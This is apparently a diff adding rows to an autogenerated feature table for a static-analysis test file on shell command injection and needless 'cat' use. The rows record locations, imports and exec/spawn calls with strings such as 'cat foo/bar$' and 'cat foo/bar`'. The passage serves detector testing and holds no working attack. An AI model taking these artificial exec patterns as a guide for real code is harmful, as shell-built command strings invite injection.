+| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:22:107:43 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:32:107:34 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:32:107:34 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:32:107:34 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:32:107:34 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:32:107:34 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:37:107:39 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:37:107:39 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:37:107:39 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:37:107:39 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:37:107:39 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:6:108:19 | "cat foo/bar$" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:21 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:21 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:21 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:21 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:22:108:43 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:32:108:34 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:32:108:34 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:32:108:34 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:32:108:34 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:32:108:34 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:37:108:39 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:37:108:39 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:37:108:39 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:37:108:39 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:37:108:39 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:6:109:19 | "cat foo/bar`" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:21 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:21 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:21 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:21 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:22:109:43 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:32:109:34 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:32:109:34 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:32:109:34 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:32:109:34 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:32:109:34 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:37:109:39 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:37:109:39 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:37:109:39 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:37:109:39 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:37:109:39 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:5 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:5 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:5 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | exceptional return of spawn(' ... it'] }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | exceptional return of spawn(' ... it'] }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | exceptional return of spawn(' ... it'] }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:7:111:11 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:14:111:50 | { stdio ... rit'] } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:20 | stdio | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:20 | stdio | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:20 | stdio | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:16:111:48 | stdio: ... herit'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | InputAccessPathFromCallee | 1.stdio | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | assignedToPropName | stdio | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:23:111:48 | ['pipe' ... herit'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:24:111:29 | 'pipe' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:32:111:36 | stdin | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:39:111:47 | 'inherit' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:2 | (functi ... ());\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:2 | (functi ... ());\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:2 | (functi ... ());\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:113:1:119:4 | (functi ... );\\n})() | contextFunctionInterfaces | 